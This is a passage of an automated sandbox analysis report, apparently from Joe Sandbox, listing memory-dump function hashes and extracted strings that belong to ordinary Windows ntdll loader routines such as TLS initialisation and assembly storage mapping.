                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  • Opcode ID: 5b0e7c566b40bfc854140fb30f113f3fd42d0ef3e4cf699efd71909b7c93ff6a
                                                  • Instruction ID: a9866fb5552f62dd1e3400a52f5754809edb0d8de55c02284fdb9ae505efb4cc
                                                  • Opcode Fuzzy Hash: 5b0e7c566b40bfc854140fb30f113f3fd42d0ef3e4cf699efd71909b7c93ff6a
                                                  • Instruction Fuzzy Hash: 113109B1E00219AEEB10EF95DD81AEFBBB8EF44744F141469EA05A6150D774BE408BA4
                                                  Strings
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 04381A51
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 04381A40
                                                  • LdrpInitializeTls, xrefs: 04381A47
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  • Opcode ID: 299f65c1a8b272cbfeb8a70af9aaa6122599b28395fd753a03c32139b73425f9
                                                  • Instruction ID: 8419cfe57c489af98ed629ae3bb74002c1322f48625ae372ce815c684bb5dc8d
                                                  • Opcode Fuzzy Hash: 299f65c1a8b272cbfeb8a70af9aaa6122599b28395fd753a03c32139b73425f9
                                                  • Instruction Fuzzy Hash: 1631B071A10A00BBFF10DF54CD49FAAB6E9EF80758F04512AE905A7590E778FD908BA0
                                                  Strings
                                                  • LdrpInitializationFailure, xrefs: 043920FA
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 04392104
                                                  • Process initialization failed with status 0x%08lx, xrefs: 043920F3
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2986994758
                                                  • Opcode ID: 9b6764341de640c98200288410533de8f25a3635708ff47929e35ad88263f7e0
                                                  • Instruction ID: 2f6ab23e2cd7c11b6704d3ba12b009199ab5a59792070961419446c8bf76a28c
                                                  • Opcode Fuzzy Hash: 9b6764341de640c98200288410533de8f25a3635708ff47929e35ad88263f7e0
                                                  • Instruction Fuzzy Hash: 49F0C831750308BFFB14EA49CD43FA677A8EB41B58F9004A9FB0077681D2B4BD50CA91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: a0b821f1c7b242108f986c1dd1ea99e8355fc245054b25913f05bc4f7968473b
                                                  • Instruction ID: bc00e6d42defee723b68872f55e8ea177b0f6ee968c95c733e4b6f185352866f
                                                  • Opcode Fuzzy Hash: a0b821f1c7b242108f986c1dd1ea99e8355fc245054b25913f05bc4f7968473b
                                                  • Instruction Fuzzy Hash: E0615B71E007199FEB24EFA88941BAEFBB9FF44704F50502DE949EB291E731A900CB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$$
                                                  • API String ID: 0-233714265
                                                  • Opcode ID: 223e517c9fecac8659d351029cbc22ee0389c41e303fbb2907b494318f2382f8
                                                  • Instruction ID: 710692f9c5a65e75dd27329ad0374662142f52c368514008cf3f7b010fdac6e5
                                                  • Opcode Fuzzy Hash: 223e517c9fecac8659d351029cbc22ee0389c41e303fbb2907b494318f2382f8
                                                  • Instruction Fuzzy Hash: 3261CF71A00B59DFEB20DFA4C680BADF7B1FF44708F106029D515AB680DB78B941EB90
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0431063D
                                                  • kLsE, xrefs: 04310540
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 0-2547482624
                                                  • Opcode ID: c1585f2f69185644437019eeada2baed755ec36e412b67f2cc408489b10bbb7f
                                                  • Instruction ID: 2c6c6bbb544f177f0df815eb7071f8374271809b3f580215eb4c5fb0c6c593e4
                                                  • Opcode Fuzzy Hash: c1585f2f69185644437019eeada2baed755ec36e412b67f2cc408489b10bbb7f
                                                  • Instruction Fuzzy Hash: 3451AD716047429BE72CEF64C5406A7B7F4EF85304F00683EE9AA87A60E770B985CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                  • API String ID: 0-118005554
                                                  • Opcode ID: c7921cd560ff8781709638f55dc73d7930f972f6ebcb3cbae4b9a7c1b9485174
                                                  • Instruction ID: ad6c2b90e5a41346e838f4eb533107b1a76def023d8de21875a401d46fa9760d
                                                  • Opcode Fuzzy Hash: c7921cd560ff8781709638f55dc73d7930f972f6ebcb3cbae4b9a7c1b9485174
                                                  • Instruction Fuzzy Hash: 6631DE312487419BE311DF68D984B2AB7E4EF84758F082869FC54CB3E1EB34E915CB92
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 04382A95
                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 04382A90
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                  • API String ID: 0-2653619699
                                                  • Opcode ID: 5150b93ee8def02de38473846044d14fdf6eb02a8393fe69cdea2dadd20d3490
                                                  • Instruction ID: b12bf2f29999de117ecb26af2f368eead50bc917cbabf1313c259cb701ff7abd
                                                  • Opcode Fuzzy Hash: 5150b93ee8def02de38473846044d14fdf6eb02a8393fe69cdea2dadd20d3490
                                                  • Instruction Fuzzy Hash: 5611EC71700214BBF7259A888D41FFBB6ED9FD4B54F2590697D04DB380E674FD009690
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Cleanup Group$Threadpool!
                                                  • API String ID: 2994545307-4008356553
                                                  • Opcode ID: 464ac0035b4e9a10d60e7a1b546033579ece906403ce69cb3579058745a624b0
                                                  • Instruction ID: b31bc6663bc65426ad132820c95779dd6695c4684b73c406575718bbbdd53ab7
                                                  • Opcode Fuzzy Hash: 464ac0035b4e9a10d60e7a1b546033579ece906403ce69cb3579058745a624b0
                                                  • Instruction Fuzzy Hash: 3C01F4B22A0700AFF351EF14CE45F6677E8EB84719F018939A658C7190E778F854CB4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MUI
                                                  • API String ID: 0-1339004836
                                                  • Opcode ID: 4a05e9a12418a223dfa1f008add2bc5a02ca0467ab33753085425b2f149e5696
                                                  • Instruction ID: ad63eb73c174c09fc647dd4757987e3397633ed1b17f66fbabd1ad64c4bddac3
                                                  • Opcode Fuzzy Hash: 4a05e9a12418a223dfa1f008add2bc5a02ca0467ab33753085425b2f149e5696
                                                  • Instruction Fuzzy Hash: AC825D75E402589FDB28CFA9C880BADB7B5BF49310F14A169D859AB760EB30BD41CF50
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a275e35e7d72d7177da8089caabe91e85e95c4f36a33e32b89b14cfdb032f0b1
                                                  • Instruction ID: 901fea2ee3845d65fb2ea0b83d4f8937939dc181493672517aef7516e7796e5e
                                                  • Opcode Fuzzy Hash: a275e35e7d72d7177da8089caabe91e85e95c4f36a33e32b89b14cfdb032f0b1
                                                  • Instruction Fuzzy Hash: 47415A75D01288AFEB20CFA9C480AEEBBF4FF48304F54816EE859A7211D734A950CF60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: f591eb9fefaa96f0350d2e03bc7c65e89aed4ad9d6e264a6f498e44b3a378ca7
                                                  • Instruction ID: 9068dc40ea95c445c92f0ac6cbe69fa52dd12a8cdaab582ae23ae9bc68be34d3
                                                  • Opcode Fuzzy Hash: f591eb9fefaa96f0350d2e03bc7c65e89aed4ad9d6e264a6f498e44b3a378ca7
                                                  • Instruction Fuzzy Hash: C1914D72A41619AFEB21DF95CD85FAEB7B8EF08B54F105065FA00AB190D774BD04CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalTags
                                                  • API String ID: 0-1106856819
                                                  • Opcode ID: dfbc5cc37951ebc0a03ce542150b2106f3346449f85d70f92ac7f2c662d4a663
                                                  • Instruction ID: 651d058fce0829874b1bbd0b3fd272aab24bfb40f81e7d40ec937b7803f0d10e
                                                  • Opcode Fuzzy Hash: dfbc5cc37951ebc0a03ce542150b2106f3346449f85d70f92ac7f2c662d4a663
                                                  • Instruction Fuzzy Hash: EC716C75E0031A9FDF28EF98D5917ADFBB1BF88704F14912EE406AB240E735A941CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                  • Instruction ID: ff109fe23461437e34c2d00d1f365515835318e4f92432ec2fe0108e2f8a8253
                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                  • Instruction Fuzzy Hash: 57615AB1D00219AFDF25DFA5C850BEEBBB8FF84714F145169E810A72A0D775AA01DFA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                  • Instruction ID: 2cd011f09bbbc3b5f6e5be3d39547ca53873cce04674411ee27baf681be8cacf
                                                  • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                  • Instruction Fuzzy Hash: 50516772604705AFEB219E64C840F6BB6E8AF84758F001929B990D62A0D7B4FD048B92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EXT-
                                                  • API String ID: 0-1948896318
                                                  • Opcode ID: 62068bb2cd55fd27ddbeaa1dd5f8a379fed643006a1734be4f872a390225ed8b
                                                  • Instruction ID: 01d85ff59e946de5bdbe5e84807eee01c7204aedd2e28e44c30bc35ccd3a2e6f
                                                  • Opcode Fuzzy Hash: 62068bb2cd55fd27ddbeaa1dd5f8a379fed643006a1734be4f872a390225ed8b
                                                  • Instruction Fuzzy Hash: 0541B5726183219BE720DA79CA42B6BB7ECAF98718F44192DF984D7140E774F904C793
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: BinaryHash
                                                  • API String ID: 2994545307-2202222882
                                                  • Opcode ID: 5dc73d7909c3d39bb124ef0e540f9abb88c379682c4018e00f662ba475a710e7
                                                  • Instruction ID: d89c5ab4491ec53459b677b11f07aa054482cf1c6246d0ded68864e2eaa60e25
                                                  • Opcode Fuzzy Hash: 5dc73d7909c3d39bb124ef0e540f9abb88c379682c4018e00f662ba475a710e7
                                                  • Instruction Fuzzy Hash: D44128B1D4062C9FEB21EB50CC84FDEB77CAF45718F005599AA08A7150DB70AE498FA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: verifier.dll
                                                  • API String ID: 0-3265496382
                                                  • Opcode ID: 3da3b1a85876146eeeb0b4d300a58dab61f35823f239a74b31c473425a1e8f15
                                                  • Instruction ID: b07a5389cc112f7e605a9278019e1bd7dd6726ac69d2d92c402dcfc1945b38d7
                                                  • Opcode Fuzzy Hash: 3da3b1a85876146eeeb0b4d300a58dab61f35823f239a74b31c473425a1e8f15
                                                  • Instruction Fuzzy Hash: 1D3160B2704201AFEF249F699850B76B6E5EF48714F54A07EE909DF380E675AC818F90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: kLsE
                                                  • API String ID: 0-3058123920
                                                  • Opcode ID: ff6523118867697cfe30e6840b64a74bdbba682582e194399401c2f4847f422c
                                                  • Instruction ID: 8bc20e7a2f4afeffbc05e29fbece6fcfa94881327127cf29bbb148b33b50b674
                                                  • Opcode Fuzzy Hash: ff6523118867697cfe30e6840b64a74bdbba682582e194399401c2f4847f422c
                                                  • Instruction Fuzzy Hash: 1241693250035147F725AF74EA44BA53B94EF80728F152529EEA14B5C0CB787CE2C7E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                  • Instruction ID: 680f327b334e4d9c3365fd3e2f4e2b55fffdb5d01ceadf3c27c78d9100c8dcb9
                                                  • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                  • Instruction Fuzzy Hash: 5F41BD75A00626ABDF219F54C490BFEB7B5EF84305F00509AE945AB640EB34F941CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Flst
                                                  • API String ID: 0-2374792617
                                                  • Opcode ID: 27e5766fc3993f4ffa63dee8cbdb5eab5b287b4221bc229071270f3745a5b082
                                                  • Instruction ID: b11379c9edcdfb75615d4f3dca3fbba41c5c2cb51edb8aa43bd51f9ffc227d32
                                                  • Opcode Fuzzy Hash: 27e5766fc3993f4ffa63dee8cbdb5eab5b287b4221bc229071270f3745a5b082
                                                  • Instruction Fuzzy Hash: 5041BAB12067019FD315CF18C580A66FBE4EF89714F1492AEE899CF281EB31F942CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx
                                                  • API String ID: 0-89312691
                                                  • Opcode ID: f24cc3b9e16705c962c538138b0908a0d7edd1f8edf9e8547294b297430f6f35
                                                  • Instruction ID: bad01654fba89277e688601f2845cbc12119da4f234cf84186d42b9c825cbabe
                                                  • Opcode Fuzzy Hash: f24cc3b9e16705c962c538138b0908a0d7edd1f8edf9e8547294b297430f6f35
                                                  • Instruction Fuzzy Hash: 37118431344942ABDB2D4F5D8C506767399EBD5328F35613AD461CB771E671F8418380
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrCreateEnclave
                                                  • API String ID: 0-3262589265
                                                  • Opcode ID: f032849f892e61e3b0f4033e1ca8aa227ebfe161c8c06a4842e98f9f04b83b1a
                                                  • Instruction ID: bcb1b1ed2afa61052687e43c1987499db4970e9ad2688b76a6c9071b2bf6900d
                                                  • Opcode Fuzzy Hash: f032849f892e61e3b0f4033e1ca8aa227ebfe161c8c06a4842e98f9f04b83b1a
                                                  • Instruction Fuzzy Hash: 8021F5B15183449BE710DF5A8844A5BFBE8EBD5B04F004A1FF9A497250DBB1E845CB92
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ef929eb99a447418aef54f5645a20a2e0ce24b2c033963a94e13bd4225ee334
                                                  • Instruction ID: 98d356077c9acce1bc6cc78ab24075d79818f03feed9420be7c865efd2ddd3dc
                                                  • Opcode Fuzzy Hash: 1ef929eb99a447418aef54f5645a20a2e0ce24b2c033963a94e13bd4225ee334
                                                  • Instruction Fuzzy Hash: CD426C75E402188FEB28DF69C881BADB7F5FF48304F189099E948EB241E734A991CF50
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
